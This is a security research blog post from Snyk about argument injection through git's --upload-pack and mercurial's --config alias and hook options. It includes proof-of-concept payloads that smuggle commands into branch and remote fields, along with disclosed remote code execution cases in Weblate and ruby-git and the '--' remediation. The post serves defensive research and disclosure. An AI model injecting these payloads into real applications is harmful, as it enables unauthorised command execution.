Rediscovering argument injection when using VCS tools — git and mercurial

Written by:
Alessio Della Libera
Alessio Della Libera
wordpress-sync/feature-argument-injection

August 23, 2022

0 mins read

One of the main goals for this research was to explore how it is possible to execute arbitrary commands even when using a safe API that prevents command injection. The focus will be on Version Control System (VCS) tools like git and hg (mercurial), that, among some of their options, allow the execution of arbitrary commands (under some circumstances).

The targets for this research are web applications and library projects (written in any programming language) that call these commands using a safe API. We haven’t targeted CLI projects, or projects that call those commands by using data coming from stored sources like configuration files.

In this blog post, we aim to demonstrate common scenarios where, even when using a safe API, it's possible to execute arbitrary commands through injection argument options. We’ll also provide remediation examples and suggestions for open source maintainers.

Argument injection background

Consider the following scenario: a developer wants to call git or hg commands from their project directory in order to interact with repositories. However, user controlled values are used as parameters to these commands (allowing the users to specify the repository url, the branch name, etc). Since the developer is aware of the command injection vulnerability, they decide to use a safe API to execute shell commands. For example, if the project is in Node.js, the spawn API from child_process module prevents command injection when called the following way:

1spawn([“command”, “-option1”, user_input, user_input’)

However, this is not always the case. As we’ll see soon, it also depends also on the command called by these APIs. If you want to know more about what is an argument injection, this Staaldraad article is a great resource.

Why should we care about git?

In some git subcommands, there are options that allow the user to specify which programs/commands will be executed. One example is the --upload-pack option available for the following git sub commands:

Let's take, for example, the git fetch, ls-remote and pull subcommands that implement the --upload-pack option.

Depending on the command, they have certain required arguments followed by optional ones. For example git fetch requires at least one argument, i.e a repository, followed by refspec and a set of options.

Running the following commands on a terminal will execute the shell command touch HELLO:

1git ls-remote --upload-pack="touch HELLO1" master
2git fetch origin --upload-pack="touch HELLO2" // git init first or in a git project
3git pull origin --upload-pack="touch HELLO3" // git init first or in a git project
4

What does vulnerable code look like with “git”?

To demonstrate this vulnerability, I’ll use Javascript and Python. To keep the examples short, let’s assume that the url and branch values are controlled by the user and not properly sanitized.

The following example demonstrates how it’s still possible to run arbitrary code, even when using a safe API that protects against classic command injections:

JavaScript (NodeJS)

1const cp = require("child_process")
2url = "--upload-pack=touch HELLO_JS"
3branch = "foo"
4cp.spawn("git", ["ls-remote", url, branch])
5cp.spawn("git", ["ls-remote", "& touch NOT_WORKING;", "foo"])

The last line demonstrates that a normal command injection payload (i.e a payload with special characters like ; & | , etc. to chain commands) does not work.

Python

1import subprocess
2url = "--upload-pack=touch HELLO_PY"
3branch = "foo"
4
5subprocess.Popen(["git", "ls-remote", url, branch], shell=False)

It’s important to note that the above scenarios can lead to command execution, if the required arguments for the corresponding git subcommands are provided. For example, if only one argument is provided to the git ls-remote subcommand without other arguments, the previous scenarios will not work:

JavaScript (NodeJS)

1const cp = require("child_process")
2url = "--upload-pack=touch HELLO_JS"
3cp.spawn("git", ["ls-remote", url])
4// fatal: No remote configured to list refs from.

This is because the only argument provided will be interpreted as a repository (in case of git ls-remote). If the command is given another valid argument, we are in the previous case and can still execute code.

Remediation suggestions

A possible solution to previous scenarios would be to add -- before user controlled values. As the official documentation explains, “when writing a script that is expected to handle random user-input, it is a good practice to make it explicit which arguments are which by placing disambiguating -- at appropriate places.”

For example, the following code will no longer lead to command execution:

1const cp = require("child_process")
2url = "--upload-pack=touch HELLO_JS"
3branch = "foo"
4cp.spawn("git", ["ls-remote", "--", url, branch])
5// fatal: strange pathname '--upload-pack=touch HELLO_JS' blocked

Why should we care about hg (mercurial)?

As we saw in the previous section, some conditions need to be satisfied in order to execute arbitrary commands (i.e required arguments). However, this is not the case for hg  — making exploitation much easier.

Among the several options available, mercurial allows users to specify aliases and hooks for every command (clone, init, log, etc…) by using the –config option.

As the mercurial documentation explains, aliases “allow you to define your own commands in terms of other commands (or aliases), optionally including arguments.  An alias can start with an exclamation point ("!") to make it a shell alias.  A shell alias is executed with the shell, allowing you to run arbitrary commands, for example:

1echo = !echo $@

will let you do "hg echo foo" to have "foo" printed in your terminal.”

Hooks, on the other hand, are “commands or Python functions that get automatically executed by various actions such as starting or finishing a commit.” They are commands that are executed once some conditions are satisfied, and can be executed before (pre-<command>) or after (post-<command>) other mercurial commands.

What does vulnerable code look like while using “hg init”?

Let’s see an example of how it’s possible to execute arbitrary commands when the hg init command is called with unsanitized user inputs.

Alias example

1hg init -config=alias.init="!touch HELLO"

The touch HELLO command will be executed. This is because an alias to the init command is defined and executed instead of the hg init command.

The same command executed from code will look like the following (as before, let’s assume that the source is controlled by the user and not properly sanitized):

JavaScript (NodeJS)
1const cp = require("child_process")
2
3source = "--config=alias.init=!touch HELLO_JS"
4cp.spawn("hg", ["init", source])
Python
1import subprocess
2source = "--config=alias.init=!touch HELLO_PY"
3subprocess.call(["hg", "init", source])

Hooks example

1hg init -config=hooks.pre-init="touch HELLO"

The touch HELLO command will be executed before (i.e the pre-<command> options) the command init is executed.

The same command executed from code will look like the following:

JavaScript (NodeJS)
1const cp = require("child_process")
2
3source = "--config=hooks.pre-init=touch HELLO_JS"
4cp.spawn("hg", ["init", source])
Python
1import subprocess
2source = "--config=hooks.pre-init=touch HELLO_PY"
3subprocess.call(["hg", "init", source])

Unlike the case of git, in order to execute arbitrary commands, we only need to control one argument provided to mercurial commands — even if it's the only parameter being used.

Remediation suggestions

Once again, we can address this issue by adding the -- characters before user controlled arguments.

For example, the following exploitation will not work anymore  — it will create a repository folder with name equal to the content of the source variable:

1const cp = require("child_process")
2
3source = "--config=alias.init=!touch HELLO_JS"
4cp.spawn("hg", ["init", "--", source])

Outcomes

Similar issues  have already been exploited in the past. Some famous examples are the remote code execution attacks on CocoaPods Trunk and Phabricator.

The table below summarizes the issues that we found and disclosed as part of this research:

After these vulnerabilities were found, we privately reported them to maintainers, following our Vulnerability Disclosure policy. I want to personally thank all the maintainers I contacted for their time and for their collaboration.

In the following case studies, we’ll explain how it was possible to execute a remote code execution and command injection in these popular projects.

Case study: Remote code execution on Weblate

Weblate is a “web based localization tool with tight version control integration”. An authenticated user was able to get remote code execution via argument injection.

When adding new translation components and using mercurial repositories, the user input branch is used in the hg pull command without any proper sanitization.

The relevant code responsible for calling the hg pull command with user controlled values is:

1# https://github.com/WeblateOrg/weblate/blob/0b45970ce1fb978be66ef696ff9983f1752828bc/weblate/vcs/mercurial.py#L364-L367
2def update_remote(self):
3    """Update remote repository."""
4    self.execute(["pull", "--branch", self.branch])
5    self.clean_revision_cache()
6
7# https://github.com/WeblateOrg/weblate/blob/0b45970ce1fb978be66ef696ff9983f1752828bc/weblate/vcs/base.py#L230
8def execute(
9    self,
10    args: List[str],
11    ...
12):
13    ...
14    try:
15        self.last_output = self._popen( # <---
16            args, #<--- 
17            self.path,
18            ...
19        )
20    ...
21    return self.last_output
22
23# https://github.com/WeblateOrg/weblate/blob/0b45970ce1fb978be66ef696ff9983f1752828bc/weblate/vcs/base.py#L191
24@classmethod
25def _popen(
26    cls,
27    args: List[str],
28    ....
29):
30    """Execute the command using popen."""
31    if args is None:
32        raise RepositoryException(0, "Not supported functionality")
33    if not fullcmd:
34        args = [cls._cmd] + list(args)
35    ...
36    process = subprocess.run(
37        args, # <---
38        ...
39    )
40    ... 
41    return process.stdout

Proof of concept

To execute arbitrary commands, the user has to create a New Translation Component in a translation project with Repository branch value equal to --config=alias.pull=!id>/app/cache/static/output_rce1.txt. In this case, the id command will be executed and redirected to a page that will be accessible at http://localhost:8888/static/output_rce1.txt.

1. Login into the application.

2. Add a new translation project and then click Save.

wordpress-sync/blog-argument-injection-weblate-project

3. Add a new translation component (to the translation project just created) with the payload --config=alias.pull=!id>/app/cache/static/output_rce1.txt in the Repository Branch field and then click Continue.

wordpress-sync/blog-argument-injection-repo-branch

4. The output of the command id will be available at http://localhost:8888/static/output_rce1.txt.

wordpress-sync/blog-argument-injection-uid

Remediation

As you can see, it was possible to achieve a RCE while also dealing with git repositories. In this case, the unsanitized user input repo was passed to the git ls-remote command.

Both of the issues were promptly fixed by the maintainer in version 4.11.1 (reference to Github Release). The fixes (mercurial and git cases) added the -- characters before the user input in order to prevent it from being interpreted as an argument.

Case study: Command injection in ruby-git

Ruby git is a “library that can be used to create, read and manipulate Git repositories by wrapping system calls to the git binary”.

When calling the fetch(remote = 'origin', opts = {}) function, the remote parameter is passed to the git fetch subcommand without any sanitization. As we have seen before, git fetch is one of the git subcommands that accepts the --upload-pack argument. For more information on --upload-pack, review the git-fetch documentation.

The relevant code responsible for calling the git fetch command with user controlled values is:

1# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/base.rb#L339-L341
2def fetch(remote = 'origin', opts={})
3    self.lib.fetch(remote, opts)  # <---
4end
5
6# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/lib.rb#L879
7def fetch(remote, opts)
8    arr_opts = [remote]
9    arr_opts << opts[:ref] if opts[:ref]
10    ...
11    command('fetch', arr_opts)  # <---
12end
13
14# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/lib.rb#L1075
15def command(cmd, *opts, &block)
16    ...
17    with_custom_env_variables do
18    command_thread = Thread.new do
19        output = run_command(git_cmd, &block) # <---
20        exitstatus = $?.exitstatus
21    end
22    command_thread.join
23    end
24
25# https://github.com/ruby-git/ruby-git/blob/521b8e7384cd7ccf3e6c681bd904d1744ac3d70b/lib/git/lib.rb#L1179
26def run_command(git_cmd, &block)
27    return IO.popen(git_cmd, &block) if block_given? # <---
28    `#{git_cmd}`.lines.map { |l| Git::EncodingUtils.normalize_encoding(l) }.join
29end

Proof of concept

The following PoC demonstrate how it was possible to execute arbitrary commands:

1require "git"
2
3g = Git.init('project')
4
5origin = "--upload-pack=touch ./HELLO1;"
6g.fetch(origin, {:ref => 'some/ref/head'} )
7
8# ls -la

Remediation

The issue was fixed by the maintainers in version 1.11.0 (GitHub release). Like in the previous issue, the fix introduced the -- characters before user controlled values.

Takeaways

… for developers

When calling commands using a safe API — that prevents command injection and accepts user controlled values — it’s important to make sure that user provided values do not change the behaviors of the command by injecting/manipulating some of the command options. To avoid such confusion, the -- characters can be used to separate arguments from user controlled values.

… for maintainers

If a function/API wrap calls to a commands accepting user controlled values, the behavior  could be worth documenting to avoid confusing users that see the maintainer handling some sanitization issues (like preventing command injection by using a safe API) but not others (like when the input can be used as a dangerous option leading to unexpected behavior).

… for security researchers

We focused our attention on git and hg commands, but there are many others that act similarly. It’s worth mentioning that even using safe APIs that prevent command injection can still lead to security issues. It all depends on the commands being executed. If you find similar issues (or any other security vulnerability) in an open source project supported by our program, please report it using the Snyk Vulnerability Disclosure form.

References:

Patch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo SegmentPatch Logo Segment

Snyk is a developer security platform. Integrating directly into development tools, workflows, and automation pipelines, Snyk makes it easy for teams to find, prioritize, and fix security vulnerabilities in code, dependencies, containers, and infrastructure as code. Supported by industry-leading application and security intelligence, Snyk puts security expertise in any developer’s toolkit.

Start freeBook a live demo